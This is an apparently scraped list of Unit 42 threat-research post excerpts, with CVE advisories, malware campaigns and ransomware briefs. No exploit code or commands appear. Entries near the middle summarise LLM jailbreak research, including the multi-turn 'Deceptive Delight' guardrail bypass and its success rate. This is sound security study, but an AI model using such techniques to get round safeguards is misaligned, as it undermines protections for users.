We have detected a campaign aimed at gaining access to victims’ machines and monetizing access to their bandwidth. It functions by exploiting the CVE-2024-36401 vulnerability in the GeoServer geospatial database. This Critical-severity remote code execution vulnerability has a CVSS score of 9.8. Criminals have used the vulnerability to deploy legitimate software development kits (SDKs) or modified apps to gain passive income via network sharing or residential proxies.
This method of generating passive
## Keys to the Kingdom: Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild
blogs_unit42 · 2025-08-11 · CVSS 10.0 · CVE-2025-32433 [CRITICAL]
Adam Robbie
Yiheng An
Malav Vyas
Cecilia Hu
Matthew Tennis
Hugo Perez
Zhanhao Chen
Rick Wyble
Published: August 11, 2025
Threat Research
Vulnerabilities
5G
CVE-2025-32433
Erlang
Operational Technology
Remote Code Execution
## Executive Summary
This article presents our observations of exploit attempts targeting CVE-2025-32433. This vulnerability allows unauthenticated remote code execution (RCE) in the Secure Shell (SSH) daemon (sshd) from certain versions of the Erlang programming language's Open Telecom Platform (OTP).
Erlang/OTP sshd is widely used in critical infrastructure and operational technology (OT) networks. With a CVSS score of 10.0, CVE-2025-32433 enables unaut
## When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts in Active Directory
blogs_unit42 · 2025-08-06
Noam Sala
Paul Michaud II
Ofir Shlomo
Published: August 6, 2025
Threat Research
Vulnerabilities
Active Directory
Microsoft
PowerShell
## Executive Summary
BadSuccessor is a critical attack vector that emerged following the release of Windows Server 2025. Under certain conditions, this server version enables users to leverage delegated Managed Service Accounts (dMSAs) to elevate privileges within Active Directory environments running Windows Server 2025. At the time of writing this article, no patch exists for this issue.
By analyzing the core mechanics of this technique and offering practical detection strategies, we help security professionals and system administrators understand
## Project AK47: Uncovering a Link to the SharePoint Vulnerability Attacks
blogs_unit42 · 2025-08-05 · CVSS 8.8 · CVE-2025-49704 [HIGH]
Hiroaki Hara
Mark Lim
Published: August 5, 2025
High Profile Threats
Threat Research
Vulnerabilities
Backdoor
CL-CRI-1040
CVE-2025-49704
CVE-2025-49706
CVE-2025-53770
CVE-2025-53771
LockBit
Microsoft
SharePoint
Storm-2603
## Executive Summary
Unit 42 observed notable overlaps between Microsoft’s reporting on ToolShell activity (an exploit chain affecting SharePoint vulnerabilities) and activity that we have been separately tracking. The activity, which we track as CL-CRI-1040, caught our attention by deploying a tool set that we call Project AK47, which includes a backdoor, ransomware and loaders.
Microsoft's report named a suspected China-based threat actor, Storm-2603. Based on our analysis o
## Active Exploitation of Microsoft SharePoint Vulnerabilities: Threat Brief (Updated August 12)
blogs_unit42 · 2025-07-31 · CVSS 8.8 · CVE-2025-49704 [HIGH]
Unit 42
Published: July 31, 2025
High Profile Threats
Vulnerabilities
CL-CRI-1040
CVE-2025-49704
CVE-2025-49706
CVE-2025-53770
CVE-2025-53771
Microsoft
SharePoint
Zero-day
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Sept. 18, 2025. Please refer to the Microsoft SharePoint customer guidance for the latest information.
## Update July 31, 2025
An investigation into ToolShell exploitation revealed the deployment of 4L4MD4R ransomware, a variant of the open-source Mauri870 ransomware.
A failed exploitation attempt on July 27, 2025, involving an encoded PowerShell command, led
## The Covert Operator's Playbook: Infiltration of Global Telecom Networks
blogs_unit42 · 2025-07-29
Renzon Cruz
Nicolas Bareil
Navin Thomas
Published: July 29, 2025
Malware
Threat Actor Groups
Threat Research
Vulnerabilities
Advanced Persistent Threat
Backdoor
CL-STA-0969
GALLIUM
GoLang
Liminal Panda
PingPull
Telecoms
UNC1945
UNC2891
UNC3886
## Executive Summary
Unit 42 has observed multiple incidents targeting the telecommunications industry in Southwest Asia. We are currently tracking this activity as CL-STA-0969. This activity includes attacking and leveraging interconnected mobile roaming networks. This report provides a technical analysis of the activity cluster based on our incident response engagements, including observed tactics, techniques and procedures (TTPs).
We found no clear
## Apache Under the Lens: Tomcat’s Partial PUT and Camel’s Header Hijack
blogs_unit42 · 2025-07-03 · CVSS 9.8 · CVE-2025-24813 [CRITICAL]
Jun Li
Qiang Liu
Yiheng An
Haozhe Zhang
Published: July 3, 2025
Threat Research
Vulnerabilities
Apache
CVE-2025-24813
CVE-2025-27636
CVE-2025-29891
Remote Code Execution
## Executive Summary
In March 2025, Apache disclosed CVE-2025-24813, a vulnerability impacting Apache Tomcat. This is a widely used platform that allows Apache web servers to run Java-based web applications. The flaw allows remote code execution, affecting Apache Tomcat versions 9.0.0.M1 to 9.0.98, 10.1.0-M1 to 10.1.34 and 11.0.0-M1 to 11.0.2.
The same month, Apache revealed two additional vulnerabilities in Apache Camel, a message routing middleware framework. These vulnera
## Threat Brief: CVE-2025-31324 (Updated June 25)
blogs_unit42 · 2025-05-23 · CVSS 10.0 · CVE-2025-31324 [CRITICAL]
Unit 42
Published: May 23, 2025
High Profile Threats
Vulnerabilities
CVE-2025-31324
Remote Code Execution
Web shells
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Monday, June 25, 2025. Please refer to the SAP Netweaver release notes for the latest information.
Update May 23, 2025: We have added further details and indicators of compromise (IoC) to this post, to provide defenders additional information to hunt with. This information can be found in the Appendix section.
On April 24, 2025, SAP disclosed CVE-2025-31324, a critical vulnerability with a CVSS score of 10.0 affecting the SAP NetWeaver's Visual Composer Framework, version 7.50. This threat brief shares a brief overview of the
## How Prompt Attacks Exploit GenAI and How to Fight Back
blogs_unit42 · 2025-04-09
Xu Zou
Published: April 9, 2025
Threat Research
Trend Reports
Vulnerabilities
GenAI
Jailbroken
LLM
Prompt injection
## Executive Summary
Palo Alto Networks has released “Securing GenAI: A Comprehensive Report on Prompt Attacks: Taxonomy, Risks, and Solutions,” which surveys emerging prompt-based attacks on AI applications and AI agents. While generative AI (GenAI) has many valid applications for enterprise productivity, there is also potential for critical security vulnerabilities in AI applications and AI agents.
The whitepaper comprehensively categorizes attacks that can manipulate AI systems into performing unintended or harmful actions — such as guardrail bypass, information leakage and goal hijacking. In the
## Multiple Vulnerabilities Discovered in a SCADA System
blogs_unit42 · 2025-03-07 · CVSS 7.0 · CVE-2024-1182 [HIGH]
Asher Davila
Malav Vyas
Published: March 7, 2025
Threat Research
Vulnerabilities
CVE-2024-1182
CVE-2024-7587
CVE-2024-8299
CVE-2024-8300
CVE-2024-9852
DLL
ICS
IIoT
IoT Attacks
IoT Security
Operational Technology
Privilege escalation
SCADA
## Executive Summary
In early 2024 we conducted a security assessment of a Supervisory Control and Data Acquisition (SCADA) system named ICONICS Suite and identified five vulnerabilities in versions 10.97.2 and earlier for Microsoft Windows. We coordinated with the ICONICS security team, which released multiple security patches in 2024 to resolve some of these issues and published timely security advisories with workarounds for the rest.
Table 1 shows the five vulnerabilities
## Investigating LLM Jailbreaking of Popular Generative AI Web Products
blogs_unit42 · 2025-02-21
Yongzhe Huang
Yang Ji
Wenjun Hu
Published: February 21, 2025
Threat Research
Vulnerabilities
GenAI
Jailbroken
LangChain
Prompt injection
## Executive Summary
This article summarizes our investigation into jailbreaking 17 of the most popular generative AI (GenAI) web products that offer text generation or chatbot services.
Large language models (LLMs) typically include guardrails to prevent users from generating content considered unsafe (such as language that is biased or violent). Guardrails also prevent users from persuading the LLM to communicate sensitive data, such as the training data used to create the model or its system prompt. Jailbreaking techniques are used to bypass those guardrails.
The g
## Multiple Vulnerabilities Discovered in NVIDIA CUDA Toolkit
blogs_unit42 · 2025-02-19 · CVSS 3.3 · CVE-2024-53870 [LOW]
Kai Lu
Published: February 19, 2025
Threat Research
Vulnerabilities
CUDA
Cuobjdump
CVE-2024-53870
CVE-2024-53871
CVE-2024-53872
CVE-2024-53873
CVE-2024-53874
CVE-2024-53875
CVE-2024-53876
CVE-2024-53877
CVE-2024-53878
Nvdisasm
NVIDIA
## Executive Summary
This article reviews nine vulnerabilities we recently discovered in two utilities called cuobjdump and nvdisasm, both from NVIDIA's Compute Unified Device Architecture (CUDA) Toolkit. We have coordinated with NVIDIA, and the company has released an update in February 2025 to address these issues.
The vulnerabilities are tracked as the following Common Vulnerabilities and Exposures (CVEs):
CVE-2024-53870
CVE-2024-53871
CVE-2024-53872
CVE-2024-53873
CV
## Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated March 11)
blogs_unit42 · 2025-01-17 · CVSS 9.0 · CVE-2025-0282 [CRITICAL]
Unit 42
Published: January 16, 2025
High Profile Threats
Vulnerabilities
CL-UNK-0979
CVE-2025-0282
CVE-2025-0283
Ivanti
SPAWNMOLE
SPAWNSLOTH
SPAWNSNAIL
UNC5337
## Executive Summary
Unit 42 stopped monitoring this threat as well as updating this brief on March 11, 2025. Please refer to Ivanti's Security Advisory for the latest information.
On Jan. 8, 2025, Ivanti released a security advisory for two vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in its Connect Secure, Policy Secure and ZTA gateway products. This threat brief provides attack details that we observed in a recent incident response engagement to provide actionable intelligence to the community. These details can be used to further detect
## Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22)
blogs_unit42 · 2024-11-22 · CVSS 9.3 · CVE-2024-0012 [CRITICAL]
Unit 42
Published: November 22, 2024
High Profile Threats
Vulnerabilities
CVE-2024-0012
CVE-2024-9474
Operation Lunar Peek
PAN-OS
## Executive Summary
Palo Alto Networks and Unit 42 continue to track exploitation activity related to CVE-2024-0012 and CVE-2024-9474. We are working with external researchers, partners and customers to share information transparently and rapidly.
Fixes for both vulnerabilities are available. Please refer to the Palo Alto Networks Security Advisories (CVE-2024-0012, CVE-2024-9474) for additional details about recommended solutions and affected products.
An authentication bypass in Palo Alto Networks PAN-OS software (CVE-2024-0012) en
## Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction
blogs_unit42 · 2024-10-23
Jay Chen
Royce Lu
Published: October 23, 2024
Threat Research
Vulnerabilities
GenAI
Jailbroken
LLM
Prompt injection
## Executive Summary
This article introduces a simple and straightforward technique for jailbreaking that we call Deceptive Delight. Deceptive Delight is a multi-turn technique that engages large language models (LLM) in an interactive conversation, gradually bypassing their safety guardrails and eliciting them to generate unsafe or harmful content.
We tested this simple yet effective method in 8,000 cases across eight models. We found that it achieves an average attack success rate of 65% within just three interaction turns with the target model.
Deceptive Delight operates by embedding un
## Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism
blogs_unit42 · 2024-10-17
Adva Gabay
Maor Dokhanian
Published: October 17, 2024
Threat Research
Vulnerabilities
Apple Gatekeeper
MacOS
Third-party applications
## Executive Summary
Unit 42 researchers have found that certain third-party utilities and applications pertaining to archiving, virtualization and Apple’s native command-line tools do not enforce the quarantine attribute. This can pose a threat to the integrity of a security feature on macOS known as Gatekeeper, which is responsible for ensuring that only trusted software runs on the system. A bypass of Gatekeeper could leave the user unprotected from risky applications that may attempt to execute malicious content.
One of the key components of the Gatekeeper security fe
## Harnessing LLMs for Automating BOLA Detection
blogs_unit42 · 2024-08-12 · CVSS 7.7 · [HIGH]
Ravid Mazon
Jay Chen
Published: August 12, 2024
Threat Research
Vulnerabilities
API
BOLA
GenAI
LLM
Web application firewall
## Executive Summary
This post presents our research on a methodology we call BOLABuster, which uses large language models (LLMs) to detect broken object level authorization (BOLA) vulnerabilities. By automating BOLA detection at scale, we will show promising results in identifying these vulnerabilities in open-source projects.
BOLA is a widespread and potentially critical vulnerability in modern APIs and web applications. While manually exploiting BOLA vulnerabilities is usually straightforward, automatically identifying new BOLAs is challenging for the following reasons:
The complexities of applicatio
## Identifying a BOLA Vulnerability in Harbor, a Cloud-Native Container Registry
blogs_unit42 · 2024-07-31 · CVSS 6.4 · [MEDIUM]
Jay Chen
Ravid Mazon
Published: July 31, 2024
Threat Research
Vulnerabilities
API attacks
BOLA
Harbor
## Executive Summary
In a recent audit of open-source web applications, threat researchers from Unit 42 have identified a broken object-level authorization (BOLA) vulnerability that impacts Harbor versions prior to 2.9.5. Harbor is a widely used cloud-native container registry that plays a role in cloud environments by hosting container images and providing features such as role-based access control (RBAC), vulnerability scanning and image signing. It is an open-source CNCF Graduated project with over 22,600 stars and 1.8 million downloads
## AI Tool Identifies BOLA Vulnerabilities in Easy!Appointments
blogs_unit42 · 2024-07-25 · CVSS 7.7 · CVE-2023-3285 [HIGH]
Ravid Mazon
Jay Chen
Published: July 25, 2024
Threat Research
Vulnerabilities
API attacks
BOLA
CVE-2023-3285
CVE-2023-3290
CVE-2023-38047
CVE-2023-38055
Easy!Appointments
## Executive Summary
Palo Alto Networks has been actively researching and developing security capabilities using AI. In an effort to audit web applications for Broken Object-Level Authorization (BOLA) vulnerabilities, Unit 42 researchers developed an automated BOLA detection tool leveraging GenAI.
In 2023, we used our tool to test an open-source project, Easy!Appointments, and found 15 BOLA vulnerabilities. We notified the vendor, who has since patched the vulnerabilities. The numb
## Vulnerabilities in LangChain Gen AI
blogs_unit42 · 2024-07-23 · CVSS 9.8 · CVE-2023-44467 [CRITICAL]
Yiheng An
Haozhe Zhang
Qi Deng
Published: July 23, 2024
Threat Research
Vulnerabilities
CVE-2023-44467
CVE-2023-46229
GenAI
LangChain
LLM
## Executive Summary
Researchers from Palo Alto Networks have identified two vulnerabilities in LangChain, a popular open source generative AI framework with over 81,000 stars on GitHub:
CVE-2023-46229
CVE-2023-44467 (LangChain experimental)
LangChain’s website states that more than one million builders use LangChain frameworks for LLM app development. Partner packages for LangChain include many of the big names in cloud, AI, databases and other tech development.
These two flaws could have allowed attackers to execute arbitrary code and a
## Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability
blogs_unit42 · 2024-07-02 · CVSS 8.1 · CVE-2024-6387 [HIGH]
Unit 42
Published: July 2, 2024
Cloud Cybersecurity Research
High Profile Threats
Vulnerabilities
CVE-2024-6387
OpenSSH
RegreSSHion
Remote Code Execution
SSH
## Executive Summary
On July 1, 2024, a critical signal handler race condition vulnerability was disclosed in OpenSSH servers (sshd) on glibc-based Linux systems. This vulnerability, called RegreSSHion and tracked as CVE-2024-6387, can result in unauthenticated remote code execution (RCE) with root privileges. This vulnerability has been rated High severity (CVSS 8.1).
This vulnerability impacts the following OpenSSH server versions:
OpenSSH versions between 8.5p1 and 9.8p1
Open SSH versio
## Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated May 20)
blogs_unit42 · 2024-04-12 · CVSS 10.0 · CVE-2024-3400 [CRITICAL]
Unit 42
Published: April 12, 2024
High Profile Threats
Malware
Vulnerabilities
Backdoor
Command injection
CVE-2024-3400
MidnightEclipse
Python
Upstyle
## Executive Summary
This threat brief is monitored daily and updated as new intelligence is available for us to share. The full update log is at the end of this post and offers the fullest account of all changes made.
Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.
A critical command injection vul
## Threat Brief: Vulnerability in XZ Utils Data Compression Library Impacting Multiple Linux Distributions (CVE-2024-3094)
blogs_unit42 · 2024-03-31 · CVSS 10.0 · CVE-2024-3094 [CRITICAL]
Unit 42
Published: March 30, 2024
Cloud Cybersecurity Research
High Profile Threats
Vulnerabilities
CVE-2024-3094
Linux
XZ Utils
## Executive Summary
On March 28, 2024, Red Hat Linux announced CVE-2024-3094 with a critical CVSS score of 10. This vulnerability is a result of a supply chain compromise impacting the versions 5.6.0 and 5.6.1 of XZ Utils. XZ Utils is data compression software included in major Linux distributions. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has advised people to downgrade to an uncompromised XZ Utils version (earlier than 5.6.0).
## Exposing a New BOLA Vulnerability in Grafana
blogs_unit42 · 2024-03-27 · CVSS 6.5 · CVE-2024-1313 [MEDIUM]
Ravid Mazon
Jay Chen
Published: March 27, 2024
Threat Research
Vulnerabilities
API
API attacks
BOLA
CVE-2024-1313
## Executive Summary
Unit 42 researchers have discovered a new Broken Object Level Authorization (BOLA) vulnerability that impacts Grafana versions from 9.5.0 before 9.5.18, from 10.0.0 before 10.0.13, from 10.1.0 before 10.1.9, from 10.2.0 before 10.2.6, and from 10.3.0 before 10.3.5. Grafana is a popular open-source data observability and visualization platform with over 20 million users worldwide and almost 60,000 stars on GitHub.
This vulnerability, assigned as CVE-2024-1313 with a CVSS score of 6.5, allows low-privileged Grafana users to delete dashboard
## Threat Brief: ConnectWise ScreenConnect Vulnerabilities (CVE-2024-1708 and CVE-2024-1709)
blogs_unit42 · 2024-02-22 · CVSS 8.4 · CVE-2024-1708 [HIGH]
Unit 42
Published: February 21, 2024
High Profile Threats
Vulnerabilities
ConnectWise
CVE-2024-1708
CVE-2024-1709
Remote desktop
Vulnerability exploit
## Executive Summary
On Feb. 13, 2024, ConnectWise was notified of two vulnerabilities impacting their remote desktop software application ScreenConnect. These vulnerabilities were first reported through their vulnerability disclosure channel in the ConnectWise Trust Center.
On Feb. 19, 2024, ConnectWise publicly disclosed the vulnerabilities in a security bulletin.
As of Feb. 21, 2024, Unit 42 observed 18,188 unique IP addresses hosting ScreenConnect globally.
The newly disc
## New Vulnerability in QNAP QTS Firmware: CVE-2023-50358
blogs_unit42 · 2024-02-13 · CVSS 5.8 · CVE-2023-50358 [MEDIUM]
Chao Lei
Jeff Luo
Zhibin Zhang
Published: February 13, 2024
Threat Research
Vulnerabilities
CVE-2023-50358
IoT
IoT Vulnerability
QNAP Network Attached Storage
## Executive Summary
This article provides technical analysis on a zero-day vulnerability affecting QNAP Network Attached Storage (NAS) devices. Our Advanced Threat Prevention (ATP) and telemetry systems provided indicators of a previously unknown vulnerability in QNAP QTS and QuTS hero firmware. We provided our findings to the vendor, and QNAP has assigned the tracking ID CVE-2023-50358 to this new vulnerability. We also offer recommendations on how to defend against this newly-revealed threat.
QNAP is
## Exploring the Latest Mispadu Stealer Variant
blogs_unit42 · 2024-02-02 · CVSS 8.8 · CVE-2023-36025 [HIGH]
Daniela Shalev
Josh Grunzweig
Published: February 2, 2024
Learning Hub
Malware
Threat Research
Vulnerabilities
Banking Trojan
CVE-2023-36025
Mispadu infostealer
## Executive Summary
Unit 42 researchers recently discovered activity attributed to Mispadu Stealer, a stealthy infostealer first reported in 2019. We found this activity as part of the Unit 42 Managed Threat Hunting offering. We discovered this threat activity while hunting for the SmartScreen CVE-2023-36025 vulnerability.
When we hunted for exploitation of the CVE-2023-36025 vulnerability in this case, we discovered an infostealer family that targets specific regions and URLs that are most commonly associated with ci
Unit42
blogs_unit42·2024-01-16·CVSS 8.2
CVE-2023-46805 [HIGH]
## Threat Brief: Multiple Ivanti Vulnerabilities (Updated Feb. 29)
Unit 42
Published: January 16, 2024
High Profile Threats
Vulnerabilities
CVE-2023-46805
CVE-2024-21887
CVE-2024-21888
CVE-2024-21893
CVE-2024-22024
Ivanti
VPNs
Unit 42 stopped monitoring this threat and updating the brief on Feb. 29, 2024. Please refer to Ivanti's website for the latest information.
## Update Feb. 29
The U.S. government, in collaboration with international government allies, has published a Joint Cybersecurity Advisory (CSA) which includes recent findings about exploitation of the Ivanti vulnerabilities. In this report the authoring organizations state that threat actors are able to deceive Ivanti’s internal and external Integr
Unit42
blogs_unit42·2023-12-07·CVSS 9.8
CVE-2023-23397 [CRITICAL]
## Fighting Ursa Aka APT28: Illuminating a Covert Campaign
Unit 42
Published: December 7, 2023
Nation-State Cyberattacks
Threat Actor Groups
Vulnerabilities
Advanced Persistent Threat
APT28
Cortex XDR
CVE-2023-23397
Fancy Bear
Fighting Ursa
Microsoft Outlook
Microsoft Vulnerability
Privilege escalation
Russia
UAC-0001
Ukraine
## Executive Summary
Early this year, Ukrainian cybersecurity researchers found Fighting Ursa leveraging a zero-day exploit in Microsoft Outlook (now known as CVE-2023-23397). This vulnerability is especially concerning since it doesn’t require user interaction to exploit. Unit 42 researchers have observed this group using CVE-2023-23397 over the past 20 months to target at least 30 o
Unit42
blogs_unit42·2023-11-13·CVSS 5.4
CVE-2023-36884 [MEDIUM]
## In-Depth Analysis of July 2023 Exploit Chain Featuring CVE-2023-36884 and CVE-2023-36584
Eli Birkan
Dan Yashnik
Oriel Cochavi
Bar Lahav
Mike Harbison
Published: November 13, 2023
Malware
Threat Research
Vulnerabilities
CVE-2023-36584
CVE-2023-36884
Exploit
Microsoft Office
Microsoft Vulnerability
Remote Code Execution
RomCom
Storm-0978
Ukraine
## Executive Summary
During our analysis of a July 2023 campaign targeting groups supporting Ukraine's admission into NATO, we discovered a new vulnerability for bypassing Microsoft's Mark-of-the-Web (MotW) security feature. This activity has been attributed by the community to the pro-Russian APT group known as Storm-0978 (also known as the RomCom Group, in referenc
Unit42
blogs_unit42·2023-11-09·CVSS 6.1
CVE-2023-3169 [MEDIUM]
## High Traffic + High Vulnerability = an Attractive Target for Criminals: The Dangers of Viewing Clickbait Sites
Shresta Bellary Seetharam
Tao Yan
Nabeel Mohamed
Tim Hofmockel
Alex Starov
Brad Duncan
Published: November 9, 2023
Cybercrime
Threat Research
Vulnerabilities
CVE-2023-3169
Web threats
## Executive Summary
Since the end of August 2023, we have observed a significant rise in compromised servers specializing in clickbait and ad content. But why are sites like this such an attractive target for criminals? Mainly because these sites are designed to reach a large number of potential victims. Furthermore, clickbait sites often use outdated or unpatched software, making them vulnerable to compromise.
This article e
Unit42
blogs_unit42·2023-11-01·CVSS 9.4
CVE-2023-4966 [CRITICAL]
## Threat Brief: Citrix Bleed CVE-2023-4966
Unit 42
Published: November 1, 2023
High Profile Threats
Vulnerabilities
Citrix
Citrix Netscaler
CVE-2023-4966
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Aug. 14, 2025. Please refer to the Citrix website for the latest information.
On Oct. 10, 2023, Citrix published a patch for their Netscaler ADC and Netscaler Gateway products. One particular vulnerability that this patch is meant to mitigate has come to be known as Citrix Bleed (CVE-2023-4966).
This nickname was given because the vulnerability can leak sensitive information from the device’s memory, which can include session tokens. Attackers can then use these credentials
Unit42
blogs_unit42·2023-10-19·CVSS 10.0
CVE-2023-20198 [CRITICAL]
## Threat Brief: Cisco IOS XE Web UI Privilege Escalation Vulnerability (Updated)
Unit 42
Published: October 18, 2023
High Profile Threats
Threat Research
Vulnerabilities
Cisco
CVE-2023-20198
## Executive Summary
On Oct. 16, 2023, Cisco published a security advisory detailing an actively exploited privilege escalation zero-day vulnerability impacting Cisco IOS XE devices. The vulnerability (CVE-2023-20198) has a criticality score of 10, according to the National Vulnerability Database, and it would allow an attacker to create an account with the highest privileges possible.
According to our attack surface telemetry from Cortex Xpanse, analysts observed 22,074 implanted IOS XE devices on Oct. 18, 2023. Telemetry
Unit42
blogs_unit42·2023-10-04·CVSS 9.8
CVE-2023-34362 [CRITICAL]
## Threat Brief - MOVEit Transfer SQL Injection Vulnerabilities: CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708 (Updated Oct 4)
Unit 42
Published: October 4, 2023
High Profile Threats
Threat Research
Vulnerabilities
CVE-2023-34362
CVE-2023-35036
CVE-2023-35708
CVE-2023-36934
MOVEit
Update October 4: We have added additional information using data gathered from Advanced Threat Prevention.
Update July 7: We cover the most recently disclosed vulnerabilities in MOVEit Transfer, as well as the July 2023 service pack.
## Executive Summary
On May 31, Progress Software posted a notification alerting customers of a critical Structured Query Language injection (SQLi) vulnerability (CVE-2023-34362) in their MOVEit Tra
Unit42
blogs_unit42·2023-09-19·CVSS 9.8
CVE-2023-40477 [CRITICAL]
## Fake CVE-2023-40477 Proof of Concept Leads to VenomRAT
Robert Falcone
Published: September 19, 2023
Malware
Threat Research
Vulnerabilities
CVE-2023-25157
CVE-2023-40477
Proof of Concept
Remote Access Trojan
Remote Code Execution
Social engineering
VenomRAT
WinRAR
## Executive Summary
Researchers should be aware of threat actors repurposing older proof of concept (PoC) code to quickly craft a fake PoC for a newly released vulnerability. On Aug. 17, 2023, the Zero Day Initiative publicly reported a remote code execution (RCE) vulnerability in WinRAR tracked as CVE-2023-40477. They had disclosed it to the vendor on June 8, 2023. Four days after the public reporting of CVE-2023-40477, an actor using an alias of w
Unit42
blogs_unit42·2023-08-10·CVSS 8.8
CVE-2023-22952 [HIGH]
## When a Zero Day and Access Keys Collide in the Cloud: Responding to the SugarCRM Zero-Day Vulnerability
Margaret Kelley
Published: August 10, 2023
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Black Hat
CVE-2023-22952
SugarCRM
Zero-day
## Executive Summary
While the SugarCRM CVE-2023-22952 zero-day authentication bypass and remote code execution vulnerability might seem like a typical exploit, there’s actually more for defenders to be aware of. Because it’s a web application, if it’s not configured or secured correctly, the infrastructure behind the scenes can allow attackers to increase their impact. When a threat actor understands the underlying technology used by cloud service provide
Unit42
blogs_unit42·2023-07-29·CVSS 9.8
CVE-2023-35078 [CRITICAL]
## Threat Brief: Multiple Vulnerabilities Including Zero-Day Remote Unauthenticated API Access – CVE-2023-35078 – in Ivanti Endpoint Manager Mobile (Updated)
Unit 42
Published: July 28, 2023
High Profile Threats
Vulnerabilities
API attacks
CVE-2023-32560
CVE-2023-35078
CVE-2023-35081
CVE-2023-35082
CVE-2023-38035
Ivanti
Zero-day
## Executive Summary
Update: As of August 23, over the last three weeks this incident has developed with three additional vulnerabilities discovered in Ivanti products. The first in MobileIron Core (CVE-2023-35082; the main topic of this threat brief post when first published in July), a second vulnerability discovered in the Ivanti Avalanche product (CVE-2023-32560), and the third in
Unit42
blogs_unit42·2023-07-28·CVSS 8.3
CVE-2023-3519 [HIGH]
## Threat Brief: RCE Vulnerability CVE-2023-3519 on Customer-Managed Citrix Servers
Unit 42
Published: July 28, 2023
High Profile Threats
Threat Research
Vulnerabilities
Citrix
Citrix Netscaler
CVE-2023-3466
CVE-2023-3467
CVE-2023-3519
## Executive Summary
On July 18, 2023, Citrix published a security bulletin for vulnerabilities affecting their NetScaler ADC and NetScaler Gateway products. When these appliances are configured as a gateway or authentication server and managed by a customer (i.e., not Citrix-managed) they can be vulnerable to remote code execution initiated by an attacker. Vulnerabilities on Citrix-managed servers have already been mitigated.
Citrix states that they have observed attacks targeti
Unit42
blogs_unit42·2023-07-12·CVSS 7.5
CVE-2023-36884 [HIGH]
## CVE-2023-36884 - Microsoft Office and Windows HTML Remote Code Execution: Threat Brief (Updated)
Unit 42
Published: July 12, 2023
High Profile Threats
Threat Research
Vulnerabilities
CVE-2023-36884
Microsoft Office
Microsoft Windows
Remote Code Execution
ROMCOM RAT
## Executive Summary
With July's Patch Tuesday release, Microsoft disclosed a zero-day Office and Windows HTML Remote Code Execution Vulnerability, CVE-2023-36884, which it rated "important" severity. Microsoft has observed active in-the-wild exploitation of this vulnerability using specially crafted Microsoft Office documents. It should be noted that exploitation requires the user to open the malicious document.
Unit 42 Threat Intelligence can co
Unit42
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL]
## IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Chao Lei
Zhibin Zhang
Yiheng An
Cecilia Hu
Published: June 22, 2023
Trend Reports
Vulnerabilities
Botnet
CVE-2019-12725
CVE-2019-17621
CVE-2019-20500
CVE-2021-25296
CVE-2021-46422
CVE-2022-27002
CVE-2022-29303
CVE-2022-30023
CVE-2022-30525
CVE-2022-31499
CVE-2022-36266
CVE-2022-40005
CVE-2022-45699
CVE-2023-1389
CVE-2023-25280
CVE-2023-27240
IoT
IoT Security
Mirai
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Pro
Unit42
blogs_unit42·2023-06-20·CVSS 7.8
CVE-2022-21882 [HIGH]
## Inside Win32k Exploitation: Analysis of CVE-2022-21882 and CVE-2021-1732
Shawn Westfall
Published: June 20, 2023
Threat Research
Vulnerabilities
CVE-2021-1732
CVE-2022-21882
Microsoft Windows
## Executive Summary
After seeing reports of two similar privilege escalation vulnerabilities in Microsoft Windows – CVE-2021-1732 and CVE-2022-21882 – we decided to analyze both to better understand the code involved in each. This is a continuation of Inside Win32k Exploitation, in which we discussed the Win32k internals and exploitation in general as background information to explore the issues surrounding CVE-2021-1732 and CVE-2022-21882.
Here, we will dig deeper into CVE-2021-1732 and CVE-2022-21882 and their related proo
Unit42
blogs_unit42·2023-06-13·CVSS 7.8
CVE-2021-1732 [HIGH]
## Inside Win32k Exploitation: Background on Implementations of Win32k and Exploitation Methodologies
Shawn Westfall
Published: June 13, 2023
Threat Research
Vulnerabilities
CVE-2021-1732
CVE-2022-21882
Microsoft Windows
## Executive Summary
In late January 2022, several reports on social media indicated that a new Microsoft Windows privilege escalation vulnerability (CVE-2022-21882) was being exploited in the wild. These reports prompted us to do an analysis of CVE-2022-21882, which turned out to be a vulnerability in the Win32k.sys user-mode callback function xxxClientAllocWindowClassExtraBytes.
In 2021, a very similar vulnerability (CVE-2021-1732) was reported to – and patched by – Microsoft. We decided to take
Unit42
blogs_unit42·2023-05-25·CVSS 9.8
CVE-2023-26801 [CRITICAL]
## Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Published: May 25, 2023
Trend Reports
Vulnerabilities
CVE-2023-26801
CVE-2023-26802
CVE-2023-27076
IoT
IZ1H9
Mirai variant
## Executive Summary
On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
CVE-2023-27076: Tenda G103 command injection vulnerability
CVE-2023-26801: LB-Link command injection vulnerability
CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
Zyxel remote code execution vulnerabilit
Unit42
blogs_unit42·2023-05-02·CVSS 9.8
CVE-2021-22005 [CRITICAL]
## Network Security Trends: November 2022-January 2023
Yiheng An
Published: May 2, 2023
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-22005
CVE-2021-31602
CVE-2021-33035
CVE-2021-43287
CVE-2022-1118
